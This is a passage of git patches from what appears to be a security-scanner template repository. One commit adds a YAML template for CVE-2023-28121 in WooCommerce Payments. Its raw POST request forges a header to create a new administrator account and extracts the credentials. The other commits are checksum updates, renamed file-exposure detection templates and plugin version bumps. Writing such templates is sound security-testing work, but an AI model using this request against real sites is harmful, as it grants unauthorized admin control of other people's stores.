++++++++++++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 http/cves/2023/CVE-2023-28121.yaml diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml new file mode 100644 index 0000000000..10de24d625 --- /dev/null +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -0,0 +1,69 @@ +id: CVE-2023-28121 + +info: + name: WooCommerce Payments - Unauthorized Admin Access + author: DhiyaneshDK + severity: critical + description: | + An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated. + reference: + - https://github.com/gbrsh/CVE-2023-28121 + - https://nvd.nist.gov/vuln/detail/CVE-2023-28121 + - https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/ + - https://woocommerce.com/products/woocommerce-payments/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-28121 + cwe-id: CWE-287,CWE-287 + epss-score: 0.0021 + cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + verified: true + google-query: inurl:/wp-content/plugins/woocommerce-payments + publicwww-query: /wp-content/plugins/woocommerce-payments + vendor: automattic + product: woocommerce_payments + framework: wordpress + tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive + +variables: + username: "{{rand_base(6)}}" + password: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + X-WCPAY-PLATFORM-CHECKOUT-USER: 1 + Content-Type: application/x-www-form-urlencoded + + rest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"registered_date":' + - '"username":' + - '"email":' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 201 + + extractors: + - type: dsl + dsl: + - '"WP_USERNAME: "+ username' + - '"WP_PASSWORD: "+ password' \ No newline at end of file From 1302fc272c17fbae8952cd815bec5b0916d1af58 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 18:15:22 +0000 Subject: [PATCH 301/609] Auto Generated New Template Addition List [Mon Jul 3 18:15:21 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bd8abaf271..fdd35889c5 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ +http/cves/2023/CVE-2023-28121.yaml http/exposed-panels/pritunl-panel.yaml http/exposed-panels/untangle-admin-login.yaml From 27e715de80d79b6f174941b7c73a6f6cd7d54d02 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 18:15:58 +0000 Subject: [PATCH 302/609] Auto Generated Templates Checksum [Mon Jul 3 18:15:58 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b65eddf089..fb6eb3d1f4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2277,6 +2277,7 @@ http/cves/2023/CVE-2023-27482.yaml:7c0352493005b43c7b29dc166a05febe2afb486f http/cves/2023/CVE-2023-27524.yaml:5d9d1c2f754a3827697cb0bf2ef692674d04ca12 http/cves/2023/CVE-2023-27587.yaml:a0b97ad8bafd98905e0b0e87847d3403fac759a7 http/cves/2023/CVE-2023-2780.yaml:dd29bca7f9f6c5e4ecdfa4b29c86a365af626436 +http/cves/2023/CVE-2023-28121.yaml:8597360791d1374d994064c71b6cfacb3e5d8ce1 http/cves/2023/CVE-2023-2825.yaml:71dcd086a266e962a2dd48ff0f1698d57a029ce7 http/cves/2023/CVE-2023-28343.yaml:4551a7c5763274fc8b10c6d805a55c695b70ab22 http/cves/2023/CVE-2023-28432.yaml:7cae99134a98c0d8fe314d759d7e5213138af7d1 @@ -3237,7 +3238,7 @@ http/exposed-panels/umbraco-login.yaml:c0a52155f373e5622c32fa7d1bcbae445f307e87 http/exposed-panels/unauth-xproxy-dashboard.yaml:3e496dc98ceffa3432c0692bba007a7f7ff13973 http/exposed-panels/unauthenticated-frp.yaml:059a007581f93d3e376cb6af12b53e164e057cf2 http/exposed-panels/unifi-panel.yaml:949f113d580ab9bb566a3b2ccca3668e6b61a164 -http/exposed-panels/untangle-admin-login.yaml:a1ed74ceae9fd2e4c6da52bc366a7da290a2bb11 +http/exposed-panels/untangle-admin-login.yaml:71adc1e01ccf9b8dff23fe8e2eabe434e307b7b8 http/exposed-panels/user-control-panel.yaml:50326a70775914bead2c0239ac53725dc488b2a5 http/exposed-panels/v2924-admin-panel.yaml:c35a6c933045f594b324e269592690b236f47aa0 http/exposed-panels/vault-panel.yaml:03707a6899d5697afa8a742aded5e86fe852d057 @@ -6487,7 +6488,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:8c093d0f2221e6f0f69c1acaadcdd8c214460c27 +templates-checksum.txt:660ede641f709d1b82ee58d0600796f2a8cfa87a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 5d644022649b2bc96aea57a508e1d828cbb42c3f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 03:50:15 +0000 Subject: [PATCH 303/609] Auto Generated New Template Addition List [Tue Jul 4 03:50:15 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fdd35889c5..e13f63097c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/cves/2023/CVE-2023-28121.yaml +http/exposed-panels/dell-idrac.yaml http/exposed-panels/pritunl-panel.yaml http/exposed-panels/untangle-admin-login.yaml From 8e649252b27446743f9e61eac534711773c0d2ec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 03:50:31 +0000 Subject: [PATCH 304/609] Auto Generated Templates Checksum [Tue Jul 4 03:50:31 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fb6eb3d1f4..60ae88f6d4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2629,6 +2629,7 @@ http/exposed-panels/dataiku-panel.yaml:ccc01376143bc524039ba721ba23d201055f3735 http/exposed-panels/davantis-panel.yaml:8e5295cc1d2a6ca2daf9aecb9edeb9c7bff6e17c http/exposed-panels/daybyday-panel.yaml:ed65d347e09146954a5b1cca407532d78a58c05e http/exposed-panels/defectdojo-panel.yaml:001b3b8655d778e45da88fdfd212b9f1195f0df7 +http/exposed-panels/dell-idrac.yaml:c7a924d17381876bc86adc6dbdc6ff3ff7780ac1 http/exposed-panels/dell-openmanager-login.yaml:c5e109cb5ad04b406e27788f57dd43b0928ec207 http/exposed-panels/dell-wyse-login.yaml:6b91c4824dda8ac6ce13fb2a958d78e02e43b54b http/exposed-panels/delta-login-panel.yaml:21413b42b25c6a8452c03d484840a0bd28137c1e @@ -6488,7 +6489,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:660ede641f709d1b82ee58d0600796f2a8cfa87a +templates-checksum.txt:7cf3279a616bc016df53e76f2cd94379618ddb20 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From dcbf2f16ee4b8a51fd6a33ebd861b41e41b57140 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 03:51:49 +0000 Subject: [PATCH 305/609] TemplateMan Update [Tue Jul 4 03:51:49 UTC 2023] :robot: --- http/exposed-panels/dell-idrac.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index 7b2ba678d4..05ec8a2bd4 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -7,11 +7,11 @@ info: description: Dell IDRAC panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 2 shodan-query: html:"thisIDRACText" + verified: true tags: panel,idrac,dell,detect http: From a9fc298b6211479b26af63be422fe0bca5e729a3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 09:22:19 +0530 Subject: [PATCH 306/609] Update and rename exposures/configs/package-json.yaml to http/exposures/configs/package-json.yaml --- .../exposures}/configs/package-json.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) rename {exposures => http/exposures}/configs/package-json.yaml (61%) diff --git a/exposures/configs/package-json.yaml b/http/exposures/configs/package-json.yaml similarity index 61% rename from exposures/configs/package-json.yaml rename to http/exposures/configs/package-json.yaml index bb82784c2b..d2c019d432 100644 --- a/exposures/configs/package-json.yaml +++ b/http/exposures/configs/package-json.yaml @@ -1,20 +1,25 @@ id: package-json info: - name: npm package.json disclosure + name: NPM package.json Disclosure author: geeknik,afaq,noraj severity: info - description: All NodeJS packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project generated by package managers such as npm, yarn, pnpm. + description: | + All NodeJS packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project generated by package managers such as npm, yarn, pnpm. reference: - https://docs.npmjs.com/cli/v9/configuring-npm/package-json - https://classic.yarnpkg.com/lang/en/docs/package-json/ - https://pnpm.io/package_json - tags: config,exposure + metadata: + max-request: 2 + verified: true + tags: config,exposure,node,npm requests: - method: GET path: - "{{BaseURL}}/package.json" + - "{{BaseURL}}/package-lock.json" matchers-condition: and matchers: @@ -25,9 +30,9 @@ requests: condition: and - type: word + part: header words: - "application/json" - part: header - type: status status: From 2a7eff561e6b7668efe595ef656cf9d41c1348c6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 09:23:24 +0530 Subject: [PATCH 307/609] Delete npm-package-lock-json.yaml --- exposures/files/npm-package-lock-json.yaml | 32 ---------------------- 1 file changed, 32 deletions(-) delete mode 100644 exposures/files/npm-package-lock-json.yaml diff --git a/exposures/files/npm-package-lock-json.yaml b/exposures/files/npm-package-lock-json.yaml deleted file mode 100644 index 13c59afae5..0000000000 --- a/exposures/files/npm-package-lock-json.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: package-lock-json - -info: - name: npm package-lock.json disclosure - author: noraj - severity: info - description: File automatically generated for any operations where npm modifies either the node_modules tree, or package.json. It's a lock file for package.json. - reference: - - https://docs.npmjs.com/cli/v9/configuring-npm/package-json - tags: exposure,files - -requests: - - method: GET - path: - - "{{BaseURL}}/package-lock.json" - - matchers-condition: and - matchers: - - type: word - words: - - "name" - - "version" - condition: and - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 From e2614b277c8a6697f1df8eb697e6e7dc650def6e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 09:24:55 +0530 Subject: [PATCH 308/609] Update and rename exposures/files/npm-shrinkwrap-exposure.yaml to http/exposures/files/npm-shrinkwrap-exposure.yaml --- .../exposures}/files/npm-shrinkwrap-exposure.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename {exposures => http/exposures}/files/npm-shrinkwrap-exposure.yaml (80%) diff --git a/exposures/files/npm-shrinkwrap-exposure.yaml b/http/exposures/files/npm-shrinkwrap-exposure.yaml similarity index 80% rename from exposures/files/npm-shrinkwrap-exposure.yaml rename to http/exposures/files/npm-shrinkwrap-exposure.yaml index 02a38bec76..c80289cb89 100644 --- a/exposures/files/npm-shrinkwrap-exposure.yaml +++ b/http/exposures/files/npm-shrinkwrap-exposure.yaml @@ -4,13 +4,15 @@ info: name: Node Shrinkwrap Exposure author: DhiyaneshDk,noraj severity: info - metadata: - verified: true - shodan-query: html:"npm-shrinkwrap.json" - description: A file created by npm shrinkwrap. It is identical to package-lock.json. + description: | + A file created by npm shrinkwrap. It is identical to package-lock.json. reference: - https://docs.npmjs.com/cli/v9/configuring-npm/npm-shrinkwrap-json - tags: config,exposure,npm,files + metadata: + verified: true + max-request: 1 + shodan-query: html:"npm-shrinkwrap.json" + tags: config,exposure,npm,files,node requests: - method: GET From 40ac62508535fa6ab0de8cec282012c7e234e448 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 09:26:37 +0530 Subject: [PATCH 309/609] Update and rename exposures/files/bower-json.yaml to http/exposures/files/bower-json.yaml --- {exposures => http/exposures}/files/bower-json.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename {exposures => http/exposures}/files/bower-json.yaml (73%) diff --git a/exposures/files/bower-json.yaml b/http/exposures/files/bower-json.yaml similarity index 73% rename from exposures/files/bower-json.yaml rename to http/exposures/files/bower-json.yaml index 6aaed4a6d7..41f2a1c95b 100644 --- a/exposures/files/bower-json.yaml +++ b/http/exposures/files/bower-json.yaml @@ -1,13 +1,14 @@ id: bower-json info: - name: bower.json file disclosure + name: bower.json File Disclosure author: oppsec,noraj severity: info - description: Bower is a package manager which stores package information in the bower.json file + description: | + Bower is a package manager which stores package information in the bower.json file reference: - https://github.com/bower/spec/blob/master/json.md - tags: exposure,files + tags: exposure,files,bower requests: - method: GET @@ -17,6 +18,7 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "name" - "description" @@ -24,9 +26,9 @@ requests: condition: and - type: word + part: header words: - "application/json" - part: header - type: status status: From e37285242e591980239410b6b8c58cd5e6e2d08b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 09:28:08 +0530 Subject: [PATCH 310/609] Update and rename exposures/files/yarn-lock.yaml to http/exposures/files/yarn-lock.yaml --- {exposures => http/exposures}/files/yarn-lock.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename {exposures => http/exposures}/files/yarn-lock.yaml (72%) diff --git a/exposures/files/yarn-lock.yaml b/http/exposures/files/yarn-lock.yaml similarity index 72% rename from exposures/files/yarn-lock.yaml rename to http/exposures/files/yarn-lock.yaml index 0cdab5e5a0..06671b0076 100644 --- a/exposures/files/yarn-lock.yaml +++ b/http/exposures/files/yarn-lock.yaml @@ -1,13 +1,14 @@ id: yarn-lock info: - name: yarn lock file disclosure + name: Yarn Lock File Disclosure author: oppsec,noraj severity: info - description: The yarn.lock file stores the versions of each Yarn dependency installed. It's a lock file for package.json. + description: | + The yarn.lock file stores the versions of each Yarn dependency installed. It's a lock file for package.json. reference: - https://classic.yarnpkg.com/lang/en/docs/yarn-lock/ - tags: exposure,files + tags: exposure,files,yarn requests: - method: GET @@ -17,15 +18,16 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY." - "# yarn lockfile v1" condition: and - type: word + part: header words: - "text/html" - part: header - type: status status: From 98088594a1db7208cb5f4e39009e189c1cdbeb0c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 04:02:06 +0000 Subject: [PATCH 311/609] Auto WordPress Plugins Update [Tue Jul 4 04:02:06 UTC 2023] :robot: --- helpers/wordpress/plugins/elementskit-lite.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/popup-maker.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 206 files changed, 6 insertions(+), 206 deletions(-) diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index c3e2bd4cc1..f3ac133c54 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -2.8.8 \ No newline at end of file +2.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 3e940eb724..7ad7fa0185 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.24.1 \ No newline at end of file +1.24.4 \ No newline at end of file diff --git 